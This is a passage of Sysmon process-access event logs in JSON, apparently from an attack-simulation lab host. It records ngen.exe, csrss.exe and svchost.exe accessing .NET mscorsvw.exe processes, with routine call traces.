RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7757,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.919\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00109B5D0C00}\r\nTargetProcessId: 4508\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.919","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00109B5D0C00}","TargetProcessId":"4508","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7758,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.919\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00109B5D0C00}\r\nTargetProcessId: 4508\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.919","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00109B5D0C00}","TargetProcessId":"4508","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7759,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.934\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00109B5D0C00}\r\nTargetProcessId: 4508\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.934","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00109B5D0C00}","TargetProcessId":"4508","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7760,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.950\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-132E-5F25-0000-0010F9A00B00}\r\nTargetProcessId: 4280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.950","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-132E-5F25-0000-0010F9A00B00}","TargetProcessId":"4280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7761,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.950\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-132E-5F25-0000-0010F9A00B00}\r\nTargetProcessId: 4280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.950","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-132E-5F25-0000-0010F9A00B00}","TargetProcessId":"4280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7762,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.965\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-0010FE600C00}\r\nTargetProcessId: 4280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.965","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-0010FE600C00}","TargetProcessId":"4280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7763,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.981\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1330-5F25-0000-001038A60B00}\r\nTargetProcessId: 3700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.981","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1330-5F25-0000-001038A60B00}","TargetProcessId":"3700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
